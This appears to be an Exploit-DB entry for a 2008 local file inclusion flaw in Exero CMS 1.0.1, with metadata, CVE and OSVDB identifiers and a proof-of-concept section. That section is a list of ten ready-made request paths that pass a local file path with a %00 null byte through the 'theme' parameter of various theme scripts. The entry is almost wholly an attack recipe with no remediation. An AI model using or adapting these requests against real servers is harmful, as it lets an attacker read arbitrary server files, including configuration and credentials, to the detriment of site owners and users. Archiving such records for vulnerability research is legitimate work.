Exero CMS 1.0.1 - 'theme' Multiple Local File Inclusions

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2008-03-16 
date_updated: 2016-11-23 
verified: 1 
codes: OSVDB-43816;CVE-2008-1409;OSVDB-43815;OSVDB-43814;OSVDB-43813;OSVDB-43812;OSVDB-43811;OSVDB-43810;OSVDB-43809;OSVDB-43808;OSVDB-43807 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comExero_CMS_1-0-1.zip

Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities
Script : http://switch.dl.sourceforge.net/sourceforge/exerocms/Exero_CMS_1-0-1.rar
Home Page : http://ecms.getox.net/
POC :

      /Exero_CMS_1-0-1/themes/Default/usercp/index.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/usercp/editpassword.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/usercp/avatar.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/custompage.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/errors/404.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/members/memberslist.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/members/profile.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/news/index.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/news/fullview.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/nopermission.php?theme=Local File %00

# milw0rm.com [2008-03-17]